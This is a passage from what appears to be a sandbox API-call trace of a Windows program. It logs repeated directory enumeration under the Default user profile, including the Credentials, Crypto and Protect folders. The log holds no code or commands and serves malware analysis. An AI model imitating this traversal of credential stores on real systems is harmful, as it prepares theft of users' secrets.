cFileName="7B2238AACCEDC3F1FFE8E7EB5F575EC9", cAlternateFileName="7B2238~1")) returned 1 [0158.096] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6451100, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="94308059B57B3142E455B38A6EB92015", cAlternateFileName="943080~1")) returned 1 [0158.096] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6451100, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="94308059B57B3142E455B38A6EB92015", cAlternateFileName="943080~1")) returned 0 [0158.096] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0158.097] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0158.097] CoTaskMemFree (pv=0x508980) [0158.097] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\*", lpFindFileData=0x2aee3c | out: lpFindFileData=0x2aee3c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0158.097] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.098] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6451100, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x104, dwReserved0=0x0, dwReserved1=0x0, cFileName="7B2238AACCEDC3F1FFE8E7EB5F575EC9", cAlternateFileName="7B2238~1")) returned 1 [0158.098] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x642afa0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x642afa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x130, dwReserved0=0x0, dwReserved1=0x0, cFileName="94308059B57B3142E455B38A6EB92015", cAlternateFileName="943080~1")) returned 1 [0158.098] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0158.098] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\*", lpFindFileData=0x2aee3c | out: lpFindFileData=0x2aee3c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0158.099] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.099] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6451100, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x104, dwReserved0=0x0, dwReserved1=0x0, cFileName="7B2238AACCEDC3F1FFE8E7EB5F575EC9", cAlternateFileName="7B2238~1")) returned 1 [0158.099] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x642afa0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x642afa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x130, dwReserved0=0x0, dwReserved1=0x0, cFileName="94308059B57B3142E455B38A6EB92015", cAlternateFileName="943080~1")) returned 1 [0158.100] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x642afa0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x642afa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x130, dwReserved0=0x0, dwReserved1=0x0, cFileName="94308059B57B3142E455B38A6EB92015", cAlternateFileName="943080~1")) returned 0 [0158.100] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0158.100] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0158.100] CoTaskMemFree (pv=0x508980) [0158.100] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\*", lpFindFileData=0x2aef14 | out: lpFindFileData=0x2aef14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0158.101] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.101] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Identities", cAlternateFileName="IDENTI~1")) returned 1 [0158.101] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x160a67d7, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0158.101] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x160a67d7, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0 [0158.102] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\*", lpFindFileData=0x2aef14 | out: lpFindFileData=0x2aef14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0158.102] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.102] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Identities", cAlternateFileName="IDENTI~1")) returned 1 [0158.102] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x160a67d7, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0158.103] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0158.103] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0158.103] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0158.103] CoTaskMemFree (pv=0x508980) [0158.104] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Identities\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0158.104] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.104] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{31810C36-5D23-4CCE-A3B4-316DED195C38}", cAlternateFileName="{31810~1")) returned 1 [0158.104] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{31810C36-5D23-4CCE-A3B4-316DED195C38}", cAlternateFileName="{31810~1")) returned 0 [0158.105] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Identities\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0158.105] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.105] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{31810C36-5D23-4CCE-A3B4-316DED195C38}", cAlternateFileName="{31810~1")) returned 1 [0158.106] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0158.106] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0158.106] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0158.106] CoTaskMemFree (pv=0x508980) [0158.106] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\*", lpFindFileData=0x2aee84 | out: lpFindFileData=0x2aee84*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0158.107] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.107] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0158.107] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\*", lpFindFileData=0x2aee84 | out: lpFindFileData=0x2aee84*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0158.108] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.108] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0158.108] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0158.108] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0158.108] CoTaskMemFree (pv=0x508980) [0158.112] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x160a67d7, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0158.122] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x160a67d7, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.122] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xea43994d, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Credentials", cAlternateFileName="CREDEN~1")) returned 1 [0158.122] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x160a67d7, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Crypto", cAlternateFileName="")) returned 1 [0158.122] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfda27f60, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfda27f60, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0158.123] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x642afa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf29f8e64, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Protect", cAlternateFileName="")) returned 1 [0158.123] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SystemCertificates", cAlternateFileName="SYSTEM~1")) returned 1 [0158.123] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf96b9c4c, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0158.123] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, 